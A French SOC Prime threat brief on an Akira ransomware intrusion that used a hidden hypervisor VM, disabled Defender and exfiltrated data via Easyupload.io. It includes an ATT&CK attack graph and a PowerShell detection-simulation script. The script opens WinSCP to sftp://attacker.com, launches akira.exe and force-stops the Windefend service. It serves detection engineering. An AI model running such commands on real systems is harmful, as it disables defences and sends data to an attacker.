SOC Prime Bias: Élevé

19 Jun 2026 07:31 UTC
newspaper icon Huntress

Akira, LimeWire, et le goût amer de l’exfiltration de données

Author Photo
SOC Prime Team linkedin icon Suivre
Akira, LimeWire, et le goût amer de l’exfiltration de données
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Résumé

Un affilié du ransomware Akira a obtenu un accès non autorisé à un hyperviseur et a créé une nouvelle machine virtuelle pour utiliser comme environnement de préparation furtif. L’attaquant s’est appuyé sur cette VM isolée pour éviter la surveillance de sécurité, préparer les données avec WinRAR et exfiltrer les archives via la plateforme de partage de fichiers Easyupload.io. Le cas démontre comment les acteurs de la menace continuent à abuser des services de téléchargement légitimes pour le vol de données.

Enquête

L’enquête a combiné la télémétrie EDR, les journaux d’événements Windows, et l’historique de navigation Microsoft Edge pour reconstruire l’intrusion. Les analystes ont également récupéré une image VHDX de la machine virtuelle malveillante, qui a révélé que l’attaquant avait désactivé Microsoft Defender et mis en place l’opération de ransomware Akira. L’examen forensic de la VM a exposé les outils, sites web et flux de travail exacts utilisés durant les phases de préparation et d’exfiltration.

Atténuation

Les organisations doivent surveiller l’apparition de nouveaux points d’accès ou de machines virtuelles non autorisés dans leur environnement. Une visibilité forte sur l’accès à distance aux systèmes critiques tels que les hyperviseurs et les contrôleurs de domaine est essentielle. Il est également important de restreindre ou de surveiller de près l’accès aux services de partage de fichiers et de téléchargement rapide connus qui peuvent être utilisés pour l’exfiltration.

Réponse

Si un accès non autorisé à un hyperviseur est identifié, isolez immédiatement l’hyperviseur concerné et toute nouvelle machine virtuelle créée. Effectuez une analyse forensic des images de disque de la VM pour déterminer l’étendue de la préparation des données et de l’exfiltration. Examinez les journaux d’accès pour retracer le point d’entrée initial et confirmez qu’aucun accès persistant par l’attaquant ne subsiste.

graph TB %% Définition des classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Phase d’accès initial action_access[« <b>Action</b> – <b>T1563.002 et T1021</b><br/>Accès non autorisé via des Services Distants<br/>et détournement de session ciblant<br/>le contrôleur de domaine et l’hyperviseur. »] class action_access action %% Phase de reconnaissance action_recon_ad[« <b>Action</b> – <b>T1087 et T1681</b><br/>Reconnaissance par énumération des<br/>utilisateurs et ordinateurs Active Directory. »] class action_recon_ad action action_recon_soft[« <b>Action</b> – <b>T1592.002</b><br/>Collecte d’informations concernant<br/>les logiciels de l’hôte. »] class action_recon_soft action %% Évasion des défenses et préparation action_hide_artifact[« <b>Action</b> – <b>T1564.006</b><br/>Dissimulation d’artefacts par l’exécution<br/>d’une nouvelle instance virtuelle sur l’hyperviseur<br/>afin de contourner les agents de sécurité. »] class action_hide_artifact action action_disable_defender[« <b>Action</b> – <b>T1685</b><br/>Dégradation des défenses par désactivation<br/>de Microsoft Defender sur la nouvelle machine virtuelle. »] class action_disable_defender defense %% Mouvement latéral et collecte de données action_lateral_move[« <b>Action</b> – <b>T1080</b><br/>Mouvement latéral vers<br/>le serveur de fichiers de l’organisation. »] class action_lateral_move action tool_winrar[« <b>Outil</b> – <b>Nom</b> : WinRAR<br/><b>Description</b> : Utilisé pour archiver<br/>des fichiers sensibles dans des dossiers partagés. »] class tool_winrar tool action_collect_data[« <b>Action</b> – <b>T1560</b><br/>Collecte de données par archivage<br/>de fichiers sensibles. »] class action_collect_data action %% Phase d’exfiltration action_stage_data[« <b>Action</b> – <b>T1074.002</b><br/>Préparation des données par stockage temporaire<br/>des archives avant exfiltration. »] class action_stage_data action action_move_tools[« <b>Action</b> – <b>T1570</b><br/>Transfert d’outils entrants pour déplacer<br/>des outils d’attaque dans l’environnement. »] class action_move_tools action tool_winscp[« <b>Outil</b> – <b>Nom</b> : WinSCP<br/><b>Description</b> : Utilisé<br/>pour le transfert de données. »] class tool_winscp tool tool_easyupload[« <b>Outil</b> – <b>Nom</b> : Easyupload.io / LimeWire<br/><b>Description</b> : Service de transfert de fichiers<br/>basé sur le Web utilisé pour l’exfiltration. »] class tool_easyupload tool action_exfiltrate[« <b>Action</b> – <b>T1071.002 et T1105</b><br/>Exfiltration via des services Web<br/>et des protocoles de transfert de fichiers. »] class action_exfiltrate action %% Phase d’impact malware_akira[« <b>Malware</b> – <b>Nom</b> : Akira ransomware<br/><b>Fichier</b> : akira.exe<br/><b>Description</b> : Chiffre les fichiers sur<br/>les partages réseau montés. »] class malware_akira malware action_impact[« <b>Action</b> – <b>T1486</b><br/>Impact par chiffrement des données. »] class action_impact action %% Flux des connexions action_access –>|mène_à| action_recon_ad action_access –>|mène_à| action_recon_soft action_recon_ad –>|mène_à| action_hide_artifact action_recon_soft –>|mène_à| action_hide_artifact action_hide_artifact –>|mène_à| action_disable_defender action_disable_defender –>|mène_à| action_lateral_move action_lateral_move –>|mène_à| action_collect_data action_collect_data –>|utilise| tool_winrar action_collect_data –>|mène_à| action_stage_data action_stage_data –>|mène_à| action_move_tools action_move_tools –>|mène_à| action_exfiltrate action_exfiltrate –>|utilise| tool_winscp action_exfiltrate –>|utilise| tool_easyupload action_exfiltrate –>|mène_à| malware_akira malware_akira –>|résulte_en| action_impact

Flux d’attaque

Exécution de simulation

Prérequis : La vérification préalable du télémétrie et du baseline doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT directement refléter les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.

  • Récit de l’attaque et commandes : L’adversaire a obtenu l’accès initial et cherche à augmenter l’impact. Ils commencent par énumérer les fichiers sensibles en vérifiant les fichiers texte connus comme AdUsers.txt. Pour préparer l’exfiltration, ils utilisent WinRAR.exe pour compresser les données. Ils préparent ensuite leur outil d’exfiltration, WinSCP.exe, et finalement exécutent la charge utile du ransomware akira.exe . Pour empêcher l’EDR/antivirus de tuer le processus, ils tentent d’arrêter le service Windefend . Cette séquence spécifique d’arguments en ligne de commande et de changements d’état de service est conçue pour déclencher la logique de détection spécifique à Akira.

  • Script de test de régression :

    # Script de simulation pour la validation de détection du ransomware Akira
# NOTE : Ce script nécessite des privilèges d'administrateur pour arrêter le service Defender.

Write-Host "[+] Démarrage de la simulation du ransomware Akira..." -ForegroundColor Cyan

# 1. Simuler la découverte/l'énumération (T1119)
Write-Host "[+] Étape 1 : Simulation de l'énumération de fichiers via Notepad..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Simuler l'archivage des données (T1560.003)
# Note : Nous supposons que WinRAR est présent ou que nous simulons l'activité en ligne de commande
Write-Host "[+] Étape 2 : Simulation de l'archivage des données avec WinRAR..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Simuler la préparation de l'outil d'exfiltration (T1105)
Write-Host "[+] Étape 3 : Simulation de l'exécution de l'outil d'exfiltration..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Simuler l'exécution du ransomware (T1204.002)
Write-Host "[+] Étape 4 : Simulation de l'exécution de la charge utile Akira..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Simuler la désactivation de Defender (T1564.006)
# Cela déclenche l'EventID 7036 dans le journal système
Write-Host "[+] Étape 5 : Tentative d'arrêt de Microsoft Defender..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulation terminée. Vérifiez les alertes dans SIEM." -ForegroundColor Green

  • Commandes de nettoyage :

    # Script de nettoyage
Write-Host "[+] Nettoyage des artefacts de simulation..." -ForegroundColor Cyan

# Redémarrer le service Defender
Start-Service -Name "Windefend"

# Supprimer les fichiers simulés
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Nettoyage terminé." -ForegroundColor Green

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement